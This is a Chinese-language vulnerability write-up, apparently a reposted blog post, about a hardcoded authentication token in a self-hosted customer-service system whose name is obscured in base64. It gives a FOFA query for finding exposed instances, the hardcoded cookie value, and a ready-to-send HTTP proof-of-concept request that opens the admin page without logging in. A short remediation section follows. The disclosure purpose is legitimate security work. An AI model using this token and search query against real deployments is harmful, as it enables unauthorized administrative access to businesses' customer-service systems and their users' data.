当前位置: 首页 > article >正文

54K55LyB5p2l5a6i5pyN57O757uf token硬编码漏洞

0x01 产品描述:

        54K55LyB5p2l5a6i5pyN57O757uf是独立源码部署的客服系统,支持接入到小程序、公众号、网站、APP。私有化源码部署,数据可控,稳定可靠。可自定义版权、logo。支持网页、微信公众号、小程序、App等任何程序对接

0x02 漏洞描述:

        54K55LyB5p2l5a6i5pyN57O757uf系统中存在一套token硬编码,可利用改token伪造系统登录从而绕过后端接口权限校验检查。

0x03 搜索语句:

Fofa:body="layui-form-item" && body="/admin/login/check.html"

d8ef7ad47cc8480f851b982f337ed608.png

0x04 漏洞复现:

硬编码数据如下:

Cookie:service_token=OuwfoovK%2BIdd

 在cookie中写入上述数据后访问admin/custom/index.html进行主页跳转

c62c5e9c459e4868a2054baf23795ec0.png poc验证

GET /admin/custom/index.html HTTP/1.1
Host: your-ip
Cookie: service_token=OuwfoovK%2BIdd
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
X-Requested-With: XMLHttpRequest

e7fa95c11d1348b19134e603b5abcc48.png

0x05 修复建议:

禁止系统中存放任何形式的硬编码数据。

通过增加ip白名单形式控制外部访问权限。


http://www.kler.cn/a/323355.html

相关文章:

  • 《生成式 AI》课程 第3講 CODE TASK 任务3:自定义任务的机器人
  • 终端快捷键学习笔记
  • 【Android、IOS、Flutter、鸿蒙、ReactNative 】启动页
  • 电子电气架构 --- 传统刷写流程怎么用在SOC上就不适用呢?
  • DAY65||Bellman_ford 队列优化算法(又名SPFA)|bellman_ford之判断负权回路|bellman_ford之单源有限最短路
  • 飞凌嵌入式RK3576核心板已适配Android 14系统
  • Spring源码学习:SpringMVC(2)DispatcherServlet初始化【子容器9大组件】
  • 对于 Vue CLI 项目如何引入Echarts以及动态获取数据
  • 机器学习-SVM
  • xxl-job 适配达梦数据库
  • StarRocks Elasticsearch Catalog原理简析
  • 【机器学习】目标分类算法概述
  • UI设计师面试整理-作品集展示
  • 基于Hive和Hadoop的招聘分析系统
  • GUI-窗口,模态窗口,拖动窗口
  • centos离线安装nvm
  • 2024新版IDEA创建JSP项目
  • 查看和升级pytorch到指定版本
  • 如何让 Android 的前端页面像 iOS 一样“优雅”?
  • 从 ES5 到 ES14:深入解析 JavaScript 的演进与特性
  • 828华为云征文|部署去中心化网络的 AI 照片管理应用 PhotoPrism
  • 【教程】最新可用! 移动云手机开启Root权限方法
  • 探索甘肃非遗:Spring Boot网站开发案例
  • Ansible-触发器_打标签
  • winsoft公司Utils组件功能简介
  • 27 基于51单片机的方向盘模拟系统